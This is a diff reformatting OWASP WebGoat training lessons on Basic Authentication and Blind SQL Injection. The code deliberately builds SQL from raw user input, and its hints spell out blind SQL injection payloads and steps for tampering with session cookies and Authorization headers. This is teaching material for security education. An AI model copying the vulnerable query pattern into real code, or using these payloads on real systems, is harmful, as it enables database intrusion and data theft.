-		    HEADER_NAME, EMPTY_STRING));
-	    headerValue = new String(s.getParser().getStringParameter(
-		    HEADER_VALUE, EMPTY_STRING));
-
-	    //<START_OMIT_SOURCE>
-	    // FIXME: This won;t work for CBT, we need to use the UserTracker
-	    //Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
-	    if (headerName.equalsIgnoreCase(AUTHORIZATION)
-		    && (headerValue.equals("guest:guest") || headerValue
-			    .equals("webgoat:webgoat")))
-	    {
-		getLessonTracker(s).setStage(2);
-		return doStage2(s);
-	    }
-	    else
-	    {
-		if (headerName.length() > 0
-			&& !headerName.equalsIgnoreCase(AUTHORIZATION))
-		{
-		    s
-			    .setMessage("Basic Authentication header name is incorrect.");
-		}
-		if (headerValue.length() > 0
-			&& !(headerValue.equals("guest:guest") || headerValue
-				.equals("webgoat:webgoat")))
-		{
-		    s
-			    .setMessage("Basic Authentication header value is incorrect.");
-
-		}
-	    }
-	    //<END_OMIT_SOURCE>
-
-	    Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
-		    .setBorder(0);
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-
-	    TR row1 = new TR();
-	    TR row2 = new TR();
-	    row1.addElement(new TD(new StringElement(
-		    "What is the name of the authentication header: ")));
-	    row2
-		    .addElement(new TD(
-			    new StringElement(
-				    "What is the decoded value of the authentication header: ")));
-
-	    row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME,
-		    headerName.toString())));
-	    row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE,
-		    headerValue.toString())));
-
-	    t.addElement(row1);
-	    t.addElement(row2);
-
-	    ec.addElement(t);
-	    ec.addElement(new P());
-
-	    Element b = ECSFactory.makeButton("Submit");
-	    ec.addElement(b);
-
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return super.createStagedContent(s);
 	}
 
-	return (ec);
-    }
-
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	protected Element doStage1(WebSession s) throws Exception
 	{
-	    if (s.getRequest().isUserInRole(WEBGOAT_BASIC))
-	    {
-		String originalUser = getLessonTracker(s).getLessonProperties()
-			.getProperty(ORIGINAL_USER, EMPTY_STRING);
-		getLessonTracker(s, originalUser).setCompleted(true);
-		getLessonTracker(s, originalUser).setStage(1);
-		getLessonTracker(s, originalUser).store(s, this);
-		makeSuccess(s);
-		s.setMessage("Close your browser and login as " + originalUser
-			+ " to get your green stars back.");
-		return ec;
-	    }
-	    else
-	    {
-		// If we are still in the ORIGINAL_USER role see if the Basic Auth header has been manipulated
-		String originalAuth = getLessonTracker(s).getLessonProperties()
-			.getProperty(ORIGINAL_AUTH, EMPTY_STRING);
-		String originalSessionId = getLessonTracker(s)
-			.getLessonProperties().getProperty(JSESSIONID,
-				s.getCookie(JSESSIONID));
+		ElementContainer ec = new ElementContainer();
 
-		// store the original user info in the BASIC properties files
-		if (originalSessionId.equals(s.getCookie(JSESSIONID)))
+		String headerName = null;
+		String headerValue = null;
+		try
 		{
-		    // Store the original user name in the "basic" user properties file.  We need to use
-		    // the original user to access the correct properties file to update status.
-		    // store the initial auth header
-		    getLessonTracker(s).getLessonProperties().setProperty(
-			    JSESSIONID, originalSessionId);
-		    getLessonTracker(s).getLessonProperties().setProperty(
-			    ORIGINAL_AUTH, s.getHeader(AUTHORIZATION));
-		    getLessonTracker(s, BASIC).getLessonProperties()
-			    .setProperty(ORIGINAL_USER, s.getUserName());
-		    getLessonTracker(s, BASIC).setStage(2);
-		    getLessonTracker(s, BASIC).store(s, this, BASIC);
+			headerName = new String(s.getParser().getStringParameter(HEADER_NAME, EMPTY_STRING));
+			headerValue = new String(s.getParser().getStringParameter(HEADER_VALUE, EMPTY_STRING));
+
+			// <START_OMIT_SOURCE>
+			// FIXME: This won;t work for CBT, we need to use the UserTracker
+			// Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+			if (headerName.equalsIgnoreCase(AUTHORIZATION)
+					&& (headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat")))
+			{
+				getLessonTracker(s).setStage(2);
+				return doStage2(s);
+			}
+			else
+			{
+				if (headerName.length() > 0 && !headerName.equalsIgnoreCase(AUTHORIZATION))
+				{
+					s.setMessage("Basic Authentication header name is incorrect.");
+				}
+				if (headerValue.length() > 0
+						&& !(headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat")))
+				{
+					s.setMessage("Basic Authentication header value is incorrect.");
+
+				}
+			}
+			// <END_OMIT_SOURCE>
+
+			Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			TR row1 = new TR();
+			TR row2 = new TR();
+			row1.addElement(new TD(new StringElement("What is the name of the authentication header: ")));
+			row2.addElement(new TD(new StringElement("What is the decoded value of the authentication header: ")));
+
+			row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME, headerName.toString())));
+			row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE, headerValue.toString())));
+
+			t.addElement(row1);
+			t.addElement(row2);
+
+			ec.addElement(t);
+			ec.addElement(new P());
+
+			Element b = ECSFactory.makeButton("Submit");
+			ec.addElement(b);
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
 
-		s.setMessage("Congratulations, you have figured out the mechanics of basic authentication.");
-		s.setMessage("&nbsp;&nbsp;- Now you must try to make WebGoat reauthenticate you as:  ");
-		s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- username:  basic");
-		s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- password:  basic");
-		s.setMessage("Use the Basic Authentication Menu to start at login page.");
-
-		// If the auth header is different but still the original user - tell the user
-		// that the original cookie was posted bak and basic auth uses the cookie before the
-		// authorization token
-		if (!originalAuth.equals("")
-			&& !originalAuth.equals(s.getHeader(AUTHORIZATION)))
-		{
-		    ec
-			    .addElement("You're almost there!  You've modified the "
-				    + AUTHORIZATION
-				    + " header but you are "
-				    + "still logged in as "
-				    + s.getUserName()
-				    + ".  Look at the request after you typed in the 'basic' "
-				    + "user credentials and submitted the request.  Remember the order of events that occur during Basic Authentication.");
-		}
-		else if (!originalSessionId.equals(s.getCookie(JSESSIONID)))
-		{
-		    ec
-			    .addElement("You're really close!  Changing the session cookie caused the server to create a new session for you.  This did not cause the server to reauthenticate you.  "
-				    + "When you figure out how to force the server to perform an authentication request, you have to authenticate as:<br><br>"
-				    + "&nbsp;&nbsp;&nbsp;&nbsp;user name: basic<br> "
-				    + "&nbsp;&nbsp;&nbsp;&nbsp;password: basic<br>");
-		}
-		else
-		{
-		    ec.addElement("Use the hints!  One at a time...");
-		}
-
-	    }
-
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return (ec);
 	}
 
-	return (ec);
-    }
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
 
+		try
+		{
+			if (s.getRequest().isUserInRole(WEBGOAT_BASIC))
+			{
+				String originalUser = getLessonTracker(s).getLessonProperties()
+						.getProperty(ORIGINAL_USER, EMPTY_STRING);
+				getLessonTracker(s, originalUser).setCompleted(true);
+				getLessonTracker(s, originalUser).setStage(1);
+				getLessonTracker(s, originalUser).store(s, this);
+				makeSuccess(s);
+				s.setMessage("Close your browser and login as " + originalUser + " to get your green stars back.");
+				return ec;
+			}
+			else
+			{
+				// If we are still in the ORIGINAL_USER role see if the Basic Auth header has been
+				// manipulated
+				String originalAuth = getLessonTracker(s).getLessonProperties()
+						.getProperty(ORIGINAL_AUTH, EMPTY_STRING);
+				String originalSessionId = getLessonTracker(s).getLessonProperties()
+						.getProperty(JSESSIONID, s.getCookie(JSESSIONID));
 
-    /**
-     *  Gets the category attribute of the ForgotPassword object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
+				// store the original user info in the BASIC properties files
+				if (originalSessionId.equals(s.getCookie(JSESSIONID)))
+				{
+					// Store the original user name in the "basic" user properties file. We need to
+					// use
+					// the original user to access the correct properties file to update status.
+					// store the initial auth header
+					getLessonTracker(s).getLessonProperties().setProperty(JSESSIONID, originalSessionId);
+					getLessonTracker(s).getLessonProperties().setProperty(ORIGINAL_AUTH, s.getHeader(AUTHORIZATION));
+					getLessonTracker(s, BASIC).getLessonProperties().setProperty(ORIGINAL_USER, s.getUserName());
+					getLessonTracker(s, BASIC).setStage(2);
+					getLessonTracker(s, BASIC).store(s, this, BASIC);
+				}
 
-	return Category.AUTHENTICATION;
-    }
+				s.setMessage("Congratulations, you have figured out the mechanics of basic authentication.");
+				s.setMessage("&nbsp;&nbsp;- Now you must try to make WebGoat reauthenticate you as:  ");
+				s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- username:  basic");
+				s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- password:  basic");
+				s.setMessage("Use the Basic Authentication Menu to start at login page.");
 
+				// If the auth header is different but still the original user - tell the user
+				// that the original cookie was posted bak and basic auth uses the cookie before the
+				// authorization token
+				if (!originalAuth.equals("") && !originalAuth.equals(s.getHeader(AUTHORIZATION)))
+				{
+					ec
+							.addElement("You're almost there!  You've modified the "
+									+ AUTHORIZATION
+									+ " header but you are "
+									+ "still logged in as "
+									+ s.getUserName()
+									+ ".  Look at the request after you typed in the 'basic' "
+									+ "user credentials and submitted the request.  Remember the order of events that occur during Basic Authentication.");
+				}
+				else if (!originalSessionId.equals(s.getCookie(JSESSIONID)))
+				{
+					ec
+							.addElement("You're really close!  Changing the session cookie caused the server to create a new session for you.  This did not cause the server to reauthenticate you.  "
+									+ "When you figure out how to force the server to perform an authentication request, you have to authenticate as:<br><br>"
+									+ "&nbsp;&nbsp;&nbsp;&nbsp;user name: basic<br> "
+									+ "&nbsp;&nbsp;&nbsp;&nbsp;password: basic<br>");
+				}
+				else
+				{
+					ec.addElement("Use the hints!  One at a time...");
+				}
 
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	//		int stage = getLessonTracker(session, BASIC).getStage();
+			}
 
-	//		switch ( stage )
-	//		{
-	//				case 1:
-	hints
-		.add("Basic authentication uses a cookie to pass the credentials. "
-			+ "Use a proxy to intercept the request.  Look at the cookies.");
-	hints
-		.add("Basic authentication uses Base64 encoding to 'scramble' the "
-			+ "user's login credentials.");
-	hints
-		.add("Basic authentication uses 'Authorization' as the cookie name to "
-			+ "store the user's credentials.");
-	hints.add("Use WebScarab -> Tools -> Transcoder to Base64 decode the "
-		+ "the value in the Authorization cookie.");
-	//					break;
-	//				case 2:
-	hints
-		.add("Basic authentication uses a cookie to pass the credentials. "
-			+ "Use a proxy to intercept the request.  Look at the cookies.");
-	hints
-		.add("Before the WebServer requests credentials from the client, the current "
-			+ "session is checked for validitity.");
-	hints
-		.add("If the session is invalid the webserver will use the basic authentication credentials");
-	hints
-		.add("If the session is invalid and the basic authentication credentials are invalid, "
-			+ "new credentials will be requested from the client.");
-	hints
-		.add("Intercept the request and corrupt the JSESSIONID and the Authorization header.");
-	//					break;
-	//		}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
 
-	return hints;
-    }
+		return (ec);
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(100);
+	/**
+	 * Gets the category attribute of the ForgotPassword object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
 
+		return Category.AUTHENTICATION;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		// int stage = getLessonTracker(session, BASIC).getStage();
 
+		// switch ( stage )
+		// {
+		// case 1:
+		hints.add("Basic authentication uses a cookie to pass the credentials. "
+				+ "Use a proxy to intercept the request.  Look at the cookies.");
+		hints.add("Basic authentication uses Base64 encoding to 'scramble' the " + "user's login credentials.");
+		hints.add("Basic authentication uses 'Authorization' as the cookie name to " + "store the user's credentials.");
+		hints.add("Use WebScarab -> Tools -> Transcoder to Base64 decode the "
+				+ "the value in the Authorization cookie.");
+		// break;
+		// case 2:
+		hints.add("Basic authentication uses a cookie to pass the credentials. "
+				+ "Use a proxy to intercept the request.  Look at the cookies.");
+		hints.add("Before the WebServer requests credentials from the client, the current "
+				+ "session is checked for validitity.");
+		hints.add("If the session is invalid the webserver will use the basic authentication credentials");
+		hints.add("If the session is invalid and the basic authentication credentials are invalid, "
+				+ "new credentials will be requested from the client.");
+		hints.add("Intercept the request and corrupt the JSESSIONID and the Authorization header.");
+		// break;
+		// }
+
+		return hints;
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(100);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Basic Authentication");
+	}
 
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Basic Authentication");
-    }
-    
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
index c7d46d3ba..44c621b75 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -6,7 +7,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -16,302 +16,294 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
- *         site</a> (this lesson is heavily based on Bruce Mayhews' SQL
- *         Injection lesson
+ * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web site</a> (this lesson
+ *         is heavily based on Bruce Mayhews' SQL Injection lesson
  * @created January 14, 2005
  */
 public class BlindSqlInjection extends LessonAdapter
 {
 
-    private final static String ACCT_NUM = "account_number";
+	private final static String ACCT_NUM = "account_number";
 
-    private final static int TARGET_ACCT_NUM = 15613;
+	private final static int TARGET_ACCT_NUM = 15613;
 
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *                Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    Connection connection = DatabaseUtilities.getConnection(s);
+		ElementContainer ec = new ElementContainer();
 
-	    ec.addElement(new P().addElement("Enter your Account Number: "));
-
-	    String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
-	    Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
-	    ec.addElement(input);
-
-	    Element b = ECSFactory.makeButton("Go!");
-	    ec.addElement(b);
-
-	    String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
-	    String answer_query;
-	    if (runningOnWindows())
-	    {
-		answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = "
-			+ TARGET_ACCT_NUM;
-	    } else
-	    {
-		answer_query = "SELECT first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM;
-	    }
-
-	    try
-	    {
-		Statement answer_statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(answer_query);
-		answer_results.first();
-		System.out.println("Account: " + accountNumber );
-		System.out.println("Answer : " + answer_results.getString(1));
-		if (accountNumber.toString().equals(answer_results.getString(1)))
+		try
 		{
-		    makeSuccess(s);
-		} else
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			ec.addElement(new P().addElement("Enter your Account Number: "));
+
+			String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
+			Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
+			ec.addElement(input);
+
+			Element b = ECSFactory.makeButton("Go!");
+			ec.addElement(b);
+
+			String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
+			String answer_query;
+			if (runningOnWindows())
+			{
+				answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM;
+			}
+			else
+			{
+				answer_query = "SELECT first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM;
+			}
+
+			try
+			{
+				Statement answer_statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(answer_query);
+				answer_results.first();
+				System.out.println("Account: " + accountNumber);
+				System.out.println("Answer : " + answer_results.getString(1));
+				if (accountNumber.toString().equals(answer_results.getString(1)))
+				{
+					makeSuccess(s);
+				}
+				else
+				{
+
+					Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
+					ResultSet results = statement.executeQuery(query);
+
+					if ((results != null) && (results.first() == true))
+					{
+						ec.addElement(new P().addElement("Account number is valid"));
+					}
+					else
+					{
+						ec.addElement(new P().addElement("Invalid account number"));
+					}
+				}
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement("An error occurred, please try again."));
+			}
+		} catch (Exception e)
 		{
-
-		    Statement statement = connection.createStatement(
-			    ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-		    ResultSet results = statement.executeQuery(query);
-
-		    if ((results != null) && (results.first() == true))
-		    {
-			ec.addElement(new P().addElement("Account number is valid"));
-		    } else
-		    {
-			ec.addElement(new P().addElement("Invalid account number"));
-		    }
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement("An error occurred, please try again."));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+
+		return (ec);
 	}
 
-	return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the SqlInjection object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public Element getCredits()
-    {
-	return new StringElement("By Chuck Willis");
-    }
-
-    /**
-     * 
-     * Determines the OS that WebGoat is running on. Needed because different DB
-     * backends are used on the different OSes (Access on Windows, InstantDB on
-     * others)
-     * 
-     * @return true if running on Windows, false otherwise
-     */
-    private boolean runningOnWindows()
-    {
-	String os = System.getProperty("os.name", "Windows");
-	if (os.toLowerCase().indexOf("window") != -1)
+	/**
+	 * Gets the category attribute of the SqlInjection object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    return true;
-	} else
-	{
-	    return false;
+		return Category.INJECTION;
 	}
-    }
 
-    /**
-     * Gets the hints attribute of the DatabaseFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	if (runningOnWindows())
+	/**
+	 * Gets the credits attribute of the AbstractLesson object
+	 * 
+	 * @return The credits value
+	 */
+	public Element getCredits()
 	{
-	    hints
-		    .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
-			    + "Create a SQL statement that you can use as a true/false test and then "
-			    + "select the first character of the target element and do a start narrowing "
-			    + "down the character using > and <"
-			    + "<br><br>The backend database is Microsoft Access.  Keep that in mind if you research SQL functions "
-			    + "on the Internet since different databases use some different functions and syntax.");
-	    hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-		    + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
-	    hints
-		    .add("The application is taking your input and inserting it at the end of a pre-formed SQL command. "
-			    + "You will need to make use of the following SQL functions: "
-			    + "<br><br>SELECT - query for your target data and get a string "
-			    + "<br><br>mid(string, start, length) - returns a "
-			    + "substring of string starting at the start character and going for length characters "
-			    + "<br><br>asc(string) will return the ascii value of the first character in string "
-			    + "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
-	    hints
-		    .add("Example: is the first character of the first_name of userid "
-			    + TARGET_ACCT_NUM
-			    + " less than 'M' (ascii 77)? "
-			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
-			    + TARGET_ACCT_NUM
-			    + ") , 1 , 1) ) < 77 ); "
-			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
-			    + "invalid then answer is no.");
-	    hints
-		    .add("Another example: is the second character of the first_name of userid "
-			    + TARGET_ACCT_NUM
-			    + " greater than 'm' (ascii 109)? "
-			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
-			    + TARGET_ACCT_NUM
-			    + ") , 2 , 1) ) > 109 ); "
-			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-			    + "invalid then answer is no.");
-	} else
-	{
-	    hints
-		    .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
-			    + "Create a SQL statement that you can use as a true/false test and then "
-			    + "select the first character of the target element and do a start narrowing "
-			    + "down the character using > and <");
-
-	    hints
-		    .add("The database backend is InstantDB.  Here is a reference guide : <a href=\"http://www.instantdb.com/doc/syntax.html\" target=\"_blank\">http://www.instantdb.com/doc/syntax.html</a>");
-	    hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-		    + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
-	    hints
-		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>The application is taking your input and inserting it at the end of a pre-formed SQL command. "
-			    + "You will need to make use of the following SQL functions: "
-			    + "<br><br>SELECT - query for your target data and get a string "
-			    + "<br><br>mid(string, start, length) - returns a "
-			    + "substring of string starting at the start character and going for length characters "
-			    + "<br><br>asc(string) will return the ascii value of the first character in string "
-			    + "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
-	    hints
-		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>Example: is the first character of the first_name of userid "
-			    + TARGET_ACCT_NUM
-			    + " less than 'M' (ascii 77)? "
-			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
-			    + TARGET_ACCT_NUM
-			    + ") , 1 , 1) ) < 77 ); "
-			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
-			    + "invalid then answer is no.");
-	    hints
-		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br> example: is the second character of the first_name of userid "
-			    + TARGET_ACCT_NUM
-			    + " greater than 'm' (ascii 109)? "
-			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
-			    + TARGET_ACCT_NUM
-			    + ") , 2 , 1) ) > 109 ); "
-			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-			    + "invalid then answer is no.");
+		return new StringElement("By Chuck Willis");
 	}
-	return hints;
-    }
 
-    /**
-     * Gets the instructions attribute of the SqlInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "The form below allows a user to enter an account number and determine if "
-		+ "it is valid or not.  Use this form to develop a true / false test check other entries in the database.  "
-		+ "<br><br>Reference Ascii Values: 'A' = 65   'Z' = 90   'a' = 97   'z' = 122 "
-		+ "<br><br>The goal is to find the value of "
-		+ "the first_name in table user_data for userid "
-		+ TARGET_ACCT_NUM
-		+ ".  Put the discovered name in the form to pass the lesson.  Only the discovered name "
-		+ "should be put into the form field, paying close attention to the spelling and capitalization.";
-
-	return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(70);
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DatabaseFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-	return ("Blind SQL Injection");
-    }
-
-    /**
-     * Constructor for the DatabaseFieldScreen object
-     * 
-     * @param s
-     *                Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-	try
+	/**
+	 * 
+	 * Determines the OS that WebGoat is running on. Needed because different DB backends are used
+	 * on the different OSes (Access on Windows, InstantDB on others)
+	 * 
+	 * @return true if running on Windows, false otherwise
+	 */
+	private boolean runningOnWindows()
 	{
-	    super.handleRequest(s);
+		String os = System.getProperty("os.name", "Windows");
+		if (os.toLowerCase().indexOf("window") != -1)
+		{
+			return true;
+		}
+		else
+		{
+			return false;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the hints attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
 	{
-	    System.out.println("Exception caught: " + e);
-	    e.printStackTrace(System.out);
+		List<String> hints = new ArrayList<String>();
+		if (runningOnWindows())
+		{
+			hints
+					.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+							+ "Create a SQL statement that you can use as a true/false test and then "
+							+ "select the first character of the target element and do a start narrowing "
+							+ "down the character using > and <"
+							+ "<br><br>The backend database is Microsoft Access.  Keep that in mind if you research SQL functions "
+							+ "on the Internet since different databases use some different functions and syntax.");
+			hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+					+ "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
+			hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. "
+					+ "You will need to make use of the following SQL functions: "
+					+ "<br><br>SELECT - query for your target data and get a string "
+					+ "<br><br>mid(string, start, length) - returns a "
+					+ "substring of string starting at the start character and going for length characters "
+					+ "<br><br>asc(string) will return the ascii value of the first character in string "
+					+ "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
+			hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM
+					+ " less than 'M' (ascii 77)? "
+					+ "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM
+					+ ") , 1 , 1) ) < 77 ); "
+					+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
+					+ "invalid then answer is no.");
+			hints
+					.add("Another example: is the second character of the first_name of userid "
+							+ TARGET_ACCT_NUM
+							+ " greater than 'm' (ascii 109)? "
+							+ "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+							+ TARGET_ACCT_NUM
+							+ ") , 2 , 1) ) > 109 ); "
+							+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
+							+ "invalid then answer is no.");
+		}
+		else
+		{
+			hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+					+ "Create a SQL statement that you can use as a true/false test and then "
+					+ "select the first character of the target element and do a start narrowing "
+					+ "down the character using > and <");
+
+			hints
+					.add("The database backend is InstantDB.  Here is a reference guide : <a href=\"http://www.instantdb.com/doc/syntax.html\" target=\"_blank\">http://www.instantdb.com/doc/syntax.html</a>");
+			hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+					+ "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
+			hints
